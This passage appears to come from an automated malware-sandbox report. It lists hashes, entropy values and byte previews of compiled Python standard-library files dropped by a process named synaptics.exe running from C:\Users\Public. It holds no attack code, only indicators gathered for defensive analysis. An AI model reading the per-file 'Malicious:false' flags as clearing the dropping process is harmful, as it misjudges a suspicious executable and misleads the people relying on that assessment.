                                                                                                                                                                                      Entropy (8bit):5.273434895618239
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:66Eb2RL5RaQHzW6FVoDCGEUPIzSh/NHSN:3RL5RLpGPIzG/NyN
                                                                                                                                                                                      MD5:67F18F8BF51412363C99EF09481528B9
                                                                                                                                                                                      SHA1:53C69583DE5B514EEED0A42CCB3BF9909A4D2708
                                                                                                                                                                                      SHA-256:CEB4FF349FC848D3386257E60D5AA336F5917F0E6E81C3E99EF6DA6AD444D800
                                                                                                                                                                                      SHA-512:37E2626B2DCAF4EF78C7AD3FFA2AD1212C80EFBF75671247FF65CE2DA670254E253551479A2ECC23C1217850C6811FE1117AB165C04B092CBFD8F70975F0F3F5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d./.......................@...s....d.Z.g.d...Z.d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.Z.d.Z.d.Z.G.d.d...d.e.j...Z.....d.d.d...Z.d.d.d...Z.d.d...Z.d.S.).z.Interface to the libbzip2 compression library...This module provides a file interface, classes for incremental.(de)compression, and functions for one-shot (de)compression..)...BZ2File..BZ2Compressor..BZ2Decompressor..open..compress..decompressz%Nadeem Vawda <nadeem.vawda@gmail.com>.....).r....N).r....r..............c....................@...s....e.Z.d.Z.d.Z.d*d.d...d.d...Z.d.d...Z.e.d.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d+d.d...Z.d,d.d...Z.d,d.d...Z.d.d...Z.d,d.d...Z.d,d.d ..Z.d!d"..Z.d#d$..Z.e.j.f.d%d&..Z.d'd(..Z.d)S.)-r....a@...A file object providing transparent bzip2 (de)compression... A BZ2File can act as a wrapper for an existing file object, or refer. directly to a named file on disk... Note that BZ2File provides a *binary* file interface - data read is. returned as bytes, and data t
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):26316
                                                                                                                                                                                      Entropy (8bit):5.2318516322769195
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:qLfNsz3TQClly8bR9PS2qYRhWmBM2A9M/PNKGH:qhmHS2qgw29KGH
                                                                                                                                                                                      MD5:6F6346D8B7485E409B6C121B774CDF63
                                                                                                                                                                                      SHA1:4560BC78FA6A965C5DDC0BC639732DBAB041B9BF
                                                                                                                                                                                      SHA-256:C47DB162E02835DB74757FD6B72B0B252F2D0D640D53071F922B957ACE68EA80
                                                                                                                                                                                      SHA-512:93ABC0ABD4CADDA418CCB60BAE643D56789826B1F0BE44D6D7102C1668F33EFCC0B2E69E0EC9C26141EE323D974943D2468357ADC0CD1FBB639680E0F0680F22
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.b.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...g.d...Z.e.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.Z.d.Z.g.d...Z.G.d.d...d...Z.G.d.d...d...Z.e.d...Z.e.d...Z.e.d...Z.e.d...Z.e.d...\.Z.Z.Z.Z.Z.Z.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z d.d...Z!d.d ..Z"d!d"..Z#G.d#d$..d$e$..Z%G.d%d&..d&e%..Z&G.d'd(..d(e%..Z'G.d)d*..d*..Z(G.d+d,..d,e&..Z)G.d-d...d.e'..Z*e&..Z+e+j,Z-d/d0..Z.e+j/Z0e+j1Z1e+j2Z3e+j4Z5e+j6Z6e+j7Z8e+j9Z:e+j;Z<d1Z=d2Z>e=e>f.d3d4..Z?e=e>f.d5d6..Z@d7ZAe..BeAd.d....C..ZDd8d9..ZEd:d;..ZFeGd<k.r.eFe.jH....d.S.d.S.)=a$...Calendar printing functions..Note when comparing these calendars to the ones printed by cal(1): By.default, these calendars have Monday as the first day of the week, and.Sunday as the last (the European convention). Use setfirstweekday() to.set the first day of the week (0=Monday, 6=Sunday)......N)...repeat)...IllegalMonthError..IllegalWeekdayError..setfirstweekday..firstweekday..isleap..leapdays..weekday..monthrange..monthcalendar..prmonth..m
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):33232
                                                                                                                                                                                      Entropy (8bit):5.022164527801481
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:5v/o6wZxokNQceWYXgYD7msLySGRbmOZwENNflPKPBxKa:5hUkFrOZwENNflPKPBxKa
                                                                                                                                                                                      MD5:6FA6A65F71E94B617C6B09F550AFB1A5
                                                                                                                                                                                      SHA1:493D5DBD8BB4907A8F5D6968A5585BE0F597DF93
                                                                                                                                                                                      SHA-256:47519EA63915306DAC39CF06D22ACFE336D2E0AD55022FC8A9BB1370D55E9F58
                                                                                                                                                                                      SHA-512:34E6FB9A37E373B036ED005C2EB9A8AA22582D3D66C45C9382D281D332DA9C78A4E491AD6ED8831F21456FA42C1BDCF09268377991F116AE76E44ED16E442DC1
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d........................@...sD...d.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.T.W.n...e.y"..Z...z.e.d.e.......d.Z.[.w.w.g.d...Z.d.Z.d...Z.Z.d...Z.Z.d.Z.d.Z.e.j.d.k.rAe...Z.Z.e.Z.n.e...Z.Z.e.Z.e.Z.e.Z.e.Z.e.Z.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z G.d.d...d...Z!G.d.d...d...Z"dCd#d$..Z#dDd%d&..Z$d'd(..Z%d)d*..Z&d+d,..Z'd-d...Z(d/d0..Z)d1d2..Z*dEd3d4..Z+dEd5d6..Z,d7d8..Z-d9d:..Z.z.e/d!..Z0e/d;..Z1e/d<..Z2e/d=..Z3e/d>..Z4e/d?..Z5W.n...e6y.......d.Z0d.Z1d.Z2d.Z3d.Z4d.Z5Y.n.w.d.Z7e7..r.d.d.l8Z8e9d@k...r e$e.j:dAdB..e._:e$e.j;dBdA..e._;d.S.d.S.)Fz. codecs -- Python Codec Registry, API and helpers....Written by Marc-Andre Lemburg (mal@lemburg.com)...(c) Copyright CNRI, All Rights Reserved. NO WARRANTY........N)...*z%Failed to load the builtin codecs: %s),..register..lookup..open..EncodedFile..BOM..BOM_BE..BOM_LE..BOM32_BE..BOM32_LE..BOM64_BE..BOM64_LE..BOM_UTF8..BOM_UTF16..BOM_UTF16_LE..BOM_UTF16_BE..BOM_UTF32..
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):20908
                                                                                                                                                                                      Entropy (8bit):5.083956166779034
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:rrfHbNxImphzxb/Dqd89tiVqnWcxavd5VCqXfNnpJ:vfHbNxhzpqd2OqnWvQAFf
                                                                                                                                                                                      MD5:FB239E9BB3DB1B804BA6CEC9D6633670
                                                                                                                                                                                      SHA1:EB3AD57CDADBF29A9539D83EAA6B3263DD51E817
                                                                                                                                                                                      SHA-256:CDA6B84A2CCD746721405BC4021721BE9DABF44D04BBDEB80E39157448CEE31B
                                                                                                                                                                                      SHA-512:AF45A4B34964D4C7F958A6481E103831B660CF664FE72FC3D7E324D3000292AD8FD3A815D66E1F21BF53D6CDBB1FDBA2038B31CA8804A5344724585CAF23D4F1
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.h.......................@...s~...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...g.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e.e.e...Z.G.d.d...d.e.e.e...Z.d.d...Z.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d ..d e...Z.G.d!d"..d"e...Z.G.d#d$..d$e...Z.G.d%d&..d&..Z.G.d'd(..d(e.e...Z.G.d)d*..d*e.e...Z.G.d+d,..d,e.e...Z d.S.)-z4Utilities for with-statement contexts. See PEP 343......N)...deque....wraps)...MethodType..Generiuseras)...asynccontextmanager..contextmanager..closing..nullcontext..AbstractContextManager..AbstractAsyncContextManager..AsyncExitStack..ContextDecorator..ExitStack..redirect_stdout..redirect_stderr..suppress..aclosingc....................@....:...e.Z.d.Z.d.Z.e.e...Z.d.d...Z.e.j.d.d.....Z.e.d.d.....Z.d.S.).r....z,An abstract base class for context managers.c....................C........|.S...z0Return `self` upon entering the runtime context.......selfr....r......C:
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7009
                                                                                                                                                                                      Entropy (8bit):5.42128193557331
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:lxPakDZxS5GXVc3isTDOuyib91quyccWEQTidqf2hMQkNv4n5q:Pa0/S5GlcR/Iib9wEREkidQ2Ov4k
                                                                                                                                                                                      MD5:8A6882910EFF4F8BCDDEBEA1A635DF0B
                                                                                                                                                                                      SHA1:57BB8DE367A62564558E2A3316077A6DD49E0445
                                                                                                                                                                                      SHA-256:D3B997323BF5D5DBA53F0D5C94F608FD8358DF1EDDCC6CACB542514676E973C8
                                                                                                                                                                                      SHA-512:523D910548F98ABEBA52779B9EEB05D3B69B0C1DDD21C46C048DE90597AFF062C7468E01EB9EDA6C906BF59B330049C08C455EB890AEE253246B3AF9A932AC3E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.#.......................@...sV...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...G.d.d...d.e...Z.e.Z.z.d.d.l.m.Z...W.n...e.y-......d.Z.Y.n.w.g.d...Z.d.d...Z.i...Z.Z.d.d...Z.e.d...e.e.e.e.e.e.e.e.e.e.e.e.e.j.e.e...e.e...e.j.e.j f.D.].Z!e.e.e!<.q[e"e.d.d...Z!e!d.u.rpe.e.e!<.e#j.e.e#<.e$j.e.e$<.e%j.e.e%<.e&j.e.e&<.e.d.u.r.e.j.e.e.<.[.[!d.g.f.d.d...Z'i...Z(Z.d.d...Z)e)e.e.d...<.e)e.e.e...<.e)e.e.e...<.e)e.e.<.e)e.e.<.e)e.e.<.e)e.e.<.e)e.e.<.e)e.e.<.e)e.e.j*<.e)e.e.<.e)e.e.<.e)e.e.j.<.e)e.e.j.<.e)e.e.j <.e)e.e.<.e'f.d.d...Z+e+e.e#<.e'f.d.d...Z,e,e.e.<.e'f.d.d...Z-e-e.e$<.e.d.u...r.e-e.e.<.d.d...Z.e.e.e.j/<.[.d.d...Z0..d.e'd...d.d...Z1[.[.[.d.S.).a....Generic (shallow and deep) copying operations...Interface summary:.. import copy.. x = copy.copy(y) # make a shallow copy of y. x = copy.deepcopy(y) # make a deep copy of y..For module specific errors, copy.Error is raised...The difference between shallow and deep copying is only relevant for.compound objects (object
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4696
                                                                                                                                                                                      Entropy (8bit):5.303895801025462
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:ZCI7QMLHGjZ99X1XBrxbbJz0uqhUaCWfqmb5p2LYHjmTrhqH3TpYXGP2:HvHGTBrpb56eWfhqLYHjmTkH3TpY2P2
                                                                                                                                                                                      MD5:4956B984789B3AD8CADD785E32F6FBDA
                                                                                                                                                                                      SHA1:33C23B1CB5AF3775A19858ABF80E0523C14314A6
                                                                                                                                                                                      SHA-256:FC9898F699ADF969F40BF7E4AEAB254B8616B90D79ED18B8111473B63D1DBCA8
                                                                                                                                                                                      SHA-512:C0EDEE3095EB4024FCA2573E28FC51E6A1546072CA7299CD8CAE05163EE45676B9903CA1B8B07137E95BE06116ABF7DC1BCBEF95EBD651B42AEB5F97BBA905F5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.Z.g.d...Z.i.Z.d.d.d...Z.d.d...Z.z.e...W.n...e.y.......Y.n.w.d.d...Z.e.e.e.e.....d.d...Z.e.e.e.e.B...e.....d.d...Z.d.Z.e.e.j...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.i.Z.i.Z.i.Z.d.d...Z.d.d...Z.d.d...Z.d.S.).z.Helper to provide extensibility for pickle...This is only useful to add pickle support for extension types defined in.C, not for instances of user-defined classes..)...pickle..constructor..add_extension..remove_extension..clear_extension_cacheNc....................C...s0...t.|...s.t.d.....|.t.|.<.|.d.u.r.t.|.....d.S.d.S.).Nz$reduction functions must be callable)...callable..TypeError..dispatch_tabler....).Z.ob_typeZ.pickle_functionZ.constructor_ob..r.....+C:\Users\Public\QExvbmVOb25l\lib\copyreg.pyr........s................r....c....................C...s....t.|...s.t.d.....d.S.).Nz.constructors must be callable).r....r....)...objectr....r....r....r........s..........r....c....................C...s....t.|.j.|.j.f.f.S...N)...complex..real..
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):11811
                                                                                                                                                                                      Entropy (8bit):5.44611565753646
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:WJq1+BG5hSIQIWWvBMKumwKZdlXiWQA3LYPqOW9PJFoKzckOMsj9XCCDH:WJqJLSIQ2OKuuZrXiWQA0shzJaYWH
                                                                                                                                                                                      MD5:8478D69950654B565547F512ECB134FE
                                                                                                                                                                                      SHA1:17E227E0F1F7CEDA398E7686366E65842DBE4871
                                                                                                                                                                                      SHA-256:857FB4AFFE24A3C2832216CDA181338D5469A5B6A9D02DBC4D97C5008EFAC260
                                                                                                                                                                                      SHA-512:2FEF72AB585D43E98F939F4EF328B773016929ACC1C8B94E94C0C3CD735A7F71D9413F7F2592BCE6884688C5E22FB7F93D1AB0DB4FF2B2227DF05C5DC0F86CE3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dZ@.......................@...s....d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.G.d.d...d...Z.G.d.d...d.e...Z.e.d.e.....G.d.d...d.e...Z.e.d.e.....G.d.d...d.e...Z.e.d.e.....G.d.d...d...Z.G.d.d...d...Z.z.e...W.n...e.y.......e.Z.Y.n.w.G.d.d...d...Z.d.S.).z+.csv.py - read/write/investigate CSV files......N)...Error..__version__..writer..reader..register_dialect..unregister_dialect..get_dialect..list_dialects..field_size_limit..QUOTE_MINIMAL..QUOTE_ALL..QUOTE_NONNUMERIC..QUOTE_NONE..__doc__)...Dialect)...StringIO).r....r....r....r....r....r....r......excel..excel_tabr....r....r....r....r....r......Snifferr....r......DictReader..DictWriter..unix_dialectc....................@...sD...e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.S.).r....z.Describe a CSV dialect... This must be subclassed (see csv.excel). Valid attributes are:. delimiter, quotechar, escapechar, doublequote, skipinitialspace,.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):56546
                                                                                                                                                                                      Entropy (8bit):5.249930277934686
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:NoP8dGbiwEyaNVxLZnkM238oZMpA635Kw9uUFoYH:NW+1LMP0
                                                                                                                                                                                      MD5:8151DD2F38C63F1B9D66144A6A90246A
                                                                                                                                                                                      SHA1:B9A6C9B8425F367AC9F492517126356969EF0A46
                                                                                                                                                                                      SHA-256:D3A053F9B935CB2EBD2B4716703A6281C129EE94664850E8F4651F4689222FAA
                                                                                                                                                                                      SHA-512:481CDAE98BE67B17039B6279FFCDBC027DB6CEA5ABD189F3F9C51B90682F249F39262BB6D94277571F52828948DDEEFB07B6660AE2E2C25C06AB4C1E0300AEE5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.a.......................@...sr...d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d...Z.d.Z.d.Z.d.Z.g.d...Z.d.g.Z.d.Z.e.d.d.....D.].Z.e...e.....e.e.7.Z.q/[.[.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d...Z.e.d...Z.e.d...Z.e.d.k.scJ...e.d.e...d...k.smJ...e.d.e...d...k.swJ...d.d...Z.g.d...Z.g.d...Z.d d!..Z.d\d#d$..Z.d%d&..Z d'd(..Z!d)d*..Z"d+d,..Z#d-d...Z$d/d0..Z%d1d2..Z&d3d4..Z'd5d6..Z(d7d8..Z)d9d:..Z*d;d<..Z+G.d=d>..d>..Z,e,d?..e,_-e,d@dAdBdBdCdD..e,_.e,d.dE..e,_/G.dFdG..dG..Z0e0Z1e0d.d.d...e0_-e0d.dHdI..e0_.e,d.dJ..e0_/G.dKdL..dL..Z2G.dMdN..dNe3..Z4e4Z5[4e2Z6G.dOdP..dP..Z.e.Z7e.d.d.d...e._-e.dAdBdBdC..e._.e,d.dE..e._/G.dQdR..dRe0..Z8e8d.d.d...e8_-e8d.dHdIdAdBdBdC..e8_.e,d.dE..e8_/dSdT..Z9G.dUdV..dVe2..Z:e:.;e,d.....e:_<e:.;e,dAdBdW......e:_-e:.;e,dAdBdW....e:_.e8dXd.d.e:j<dY..Z=z.d.dZl>T.W.n...e?..y.......Y.d.S.w.[.[.[.[.[.[.[=[.[.[.['[([)[%[&[.[*[1[.[.[.[.[ [.[.[9[.[.[.[7[6[![.[+["[$[#[5d.d[l>m.Z...d.S.)]z.Concrete date/time and related types...See http://www.iana.org/time-
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):15669
                                                                                                                                                                                      Entropy (8bit):5.467710098109918
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:CDdon2oDAV888oUZ7tDzEMDfdF6ZSdDz0TxkxVGdAZiVxiEa+0:CDdroM9UfD6ZBkrYAZiVkEa+0
                                                                                                                                                                                      MD5:95987344454FDBB327A408F80148A2A4
                                                                                                                                                                                      SHA1:DBA50C88DF77C384A146C87715ADBD5419F1A3A6
                                                                                                                                                                                      SHA-256:BC6EFF95C4A128D77EDEFFEB35C8339DC88E44D9F10D9EA1BB943AA84708638E
                                                                                                                                                                                      SHA-512:CB4498AF74814F5B7302C5CA7C739B0DFA01B183010E2C4277F2732F8D581B7E98E5E83FD27EA34F04E05A45436D4356A84E0228E5236A61334D861C2043C415
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dPP.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.d.d.l.m.Z...g.d...e...Z.[.e.j.e.j.e.j.e.e.e.f.Z.e.d...Z.d.e.d.f.e.d.f.e.d.f.f.Z.e.d...Z.d.Z.d.d...Z.dVd.d.d...d.d...Z.dVd.d...d.d...Z.d.d.d.d.d.d.d.d.d.d.d...Z.d d!..Z.d"d#..Z.d$d%..Z.d&d'..Z.d.d...d(d)..Z.e.. d*d+..Z!d,e!j"_.d-e!j._.d.e!j#_.d/e!j$_.d0e!j%_.d1e!j&_.d2e!j'_.d3e!j(_.d4Z)d5Z*G.d6d7..d7e!..Z+d.d8..d9d:..Z,d;d<..Z-d=d>..Z.....dWd?d@..Z/dXd.d...dBdC..Z0d.d.d...dDdE..Z1....dYd.d.dF..dGdH..Z2dIdJ..Z3e0Z4dKdL..Z5dMdN..Z6dOdP..Z7G.dQdR..dR..Z8dSdT..Z9e:dUk...r.e9....d.S.d.S.)Zz0Disassembler of Python byte code into mnemonics......N)...*)...__all__)...code_info..dis..disassemble..distb..disco..findlinestarts..findlabels..show_code..get_instructions..Instruction..Bytecode..FORMAT_VALUE).N....str..repr..ascii..MAKE_FUNCTION)...defaults..kwdefaults..annotationsZ.closurec....................C...s4...z.t.|.|.d...}.W.|.S...t.y.......t.|.|.d...}.Y.|.S.w.).z.Attempts to compile the given source, fir
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):26076
                                                                                                                                                                                      Entropy (8bit):5.281841752125299
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:EXTKNlN1WNI0LUjkGo9dwskW5nW3jj82kV0GVH5sH9LBu0KlGVa+3I:ED0N1BFIdwFJ3XcvVHWBBZ+GVaN
                                                                                                                                                                                      MD5:7C57048FC0F3C70E0EC8EF78E5A75039
                                                                                                                                                                                      SHA1:0599D6FF1333F799AF6C9E3A5818B78B44042472
                                                                                                                                                                                      SHA-256:049500D68CE07950C2312507758D1450E1F58A92B3E9BFD71CBF2C26157AC2D5
                                                                                                                                                                                      SHA-512:5F1462BD7F2616CD0031547B7955345F85F42925D015708CBF958ECCD53F8B5F3587FF9DB680A52558E1CAF5F374EA0D4CB170B7490DB63EA9CD84A4B69B3001
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.d.l.Z.d.d.l.m.Z.m.Z...g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.d.Z.G.d.d...d.e...Z.G.d.d...d.e.d...Z.G.d.d...d.e.e...Z.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.d.d ..Z.d!d"..Z.d#d$..Z.d.S.)%.....N)...MappingProxyType..DynamicClassAttribute)...EnumMeta..Enum..IntEnum..Flag..IntFlag..auto..uniquec....................C...s....t.|.d...p.t.|.d...p.t.|.d...S.).z?. Returns True if obj is a descriptor, False otherwise.. ..__get__..__set__..__delete__)...hasattr)...obj..r.....(C:\Users\Public\QExvbmVOb25l\lib\enum.py.._is_descriptor....s..............r....c....................C...sL...t.|...d.k.o%|.d.d.....|.d.d.........k.o.d.k.n.....o%|.d...d.k.o%|.d...d.k.S.).z=. Returns True if a __dunder__ name, False otherwise.. .....N..........Z.__.._.........len....namer....r....r......_is_dunder....s......&...........r....c....................C...sL...t.|...d.k.o%|.d...|.d.......k.o.d.k.n.....o%|.d.d.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4257
                                                                                                                                                                                      Entropy (8bit):5.6699325806902365
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:rZ1NvFl7gPHnHns99V7Ry+/63Tq7Y1qYmWVzHRJwZLaL1iCtiOy9:r1vFl7g/HnsV7g7HzTRbdUV
                                                                                                                                                                                      MD5:BB53BE48728605E42B055F6A4A417DD8
                                                                                                                                                                                      SHA1:E389FB3B0FF235A1D0005CC01E486BDCDBE8D346
                                                                                                                                                                                      SHA-256:35874B2E09D1095038C3A541FFEFBB27452F807ECC95AC1C44AD75C841B6229E
                                                                                                                                                                                      SHA-512:EA2A66135115ACA2C75EC8A4E1D3618267FCF4EE5FE8C3CCE4FDF7ABACA6FB9C46948CF7841580295EE762D4DE31BE3723C7BD5D2D209CE8E87855DFE222710A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s|...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d.d.l.m.Z...e...j.Z.[.d.d...Z.e.j.d.d.d...d.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.S.).a....Filename matching with shell patterns...fnmatch(FILENAME, PATTERN) matches according to the local convention..fnmatchcase(FILENAME, PATTERN) always takes case in account...The functions operate by translating the pattern into a regular.expression. They cache the compiled regular expressions for speed...The function translate(PATTERN) returns a regular expression.corresponding to PATTERN. (It does not compile it.)......N)...filter..fnmatch..fnmatchcase..translate)...countc....................C...s"...t.j...|...}.t.j...|...}.t.|.|...S.).a....Test whether FILENAME matches PATTERN... Patterns are Unix shell style:.. * matches everything. ? matches any single character. [seq] matches any character in seq. [!seq] matches any char not in seq.. An initial period in FILENAME is not spec
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):28348
                                                                                                                                                                                      Entropy (8bit):5.34686521614029
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:8oO3KwCQNi3/sZoyIw/kj6N4V9xI8HkXRssPmCzCe/:8o1FQNi30Cj6iV9hHkhsm7me/
                                                                                                                                                                                      MD5:4AFFB5CA18395D2BFADF605C03A6E355
                                                                                                                                                                                      SHA1:3C50CE51D055E4D19B55B485C9FB689819BC7F51
                                                                                                                                                                                      SHA-256:E5D5CAB466D60B6FCF0D2DA5ED3696F17D93CC0C8681BCD297F5F7E62AE8ED02
                                                                                                                                                                                      SHA-512:9D1854016698F9774933EFE5C060F8836E9432E6A57E7523639FEDB0443CE6F27FE4925E963AD64812038E3256CB30431356D12B8B3FE432898F28D42C041C93
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.Z.g.d...Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.e.e.f.d.d...Z.e.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d d!..Z.e.f.d"d#..Z.e.f.d$d%..Z.d&e.f.d'e.f.d(e.f.g.d(e.f.d)e.f.d&e.f.g.d)e.f.d(e.f.d'e.f.g.d'e.f.d&e.f.d)e.f.g.d*..Z.d+d,..Z.d-d...Z.z.d.d/l m.Z...W.n...e!y.......Y.n.w.e"..Z#e#f.d0d1..Z$z.d.d2l m$Z$..W.n...e!y.......Y.n.w.G.d3d4..d4..Z%z.d.d5l m%Z%..W.n...e!y.......Y.n.w.G.d6d7..d7e"..Z&d8d9..Z'e.d:g.d;....Z(G.d<d=..d=e)..Z*e"..f.e+e,h.e-e.e/f.d>d?..Z0dXdBdC..Z1dDdE..Z2z.d.dFl m2Z2..W.n...e!..y;......Y.n.w.dGdH..Z3dIdJ..Z4dYdLdM..Z5dNdO..Z6dPdQ..Z7dRdS..Z8G.dTdU..dU..Z9e"..Z:G.dVdW..dW..Z;dKS.)ZzEfunctools.py - Tools for working with functions and callable objects.)...update_wrapper..wraps..WRAPPER_ASSIGNMENTS..WRAPPER_UPDATES..total_ordering..cache..cmp_to_key..lru_cache..reduce..partial..partialmethod..singledispatch..si
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3920
                                                                                                                                                                                      Entropy (8bit):5.173903194720584
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:uqsfAs4EvyosntVf4/zsSQ1ow+2U/tAaDKDj51dmvuoZ:Fs4rtKyow8/tjgqWoZ
                                                                                                                                                                                      MD5:19F3748F57EF10D994F72A07C1E0499C
                                                                                                                                                                                      SHA1:EB272A2AE0FDFC8B7C8AAE6D598AB520FE37962B
                                                                                                                                                                                      SHA-256:276CCE8EE5FAB78B2EA97635A1622C5E6817963860BD3531BC5F967E31C88A85
                                                                                                                                                                                      SHA-512:A0020A5541458120126F4CDAF6534788C64C4F98F7CE89D6A523241EBBFCD581595A18DD9F1AA48184132D758DC7F9A6A5B0C24DACB955CF649378B19F0C2DAA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
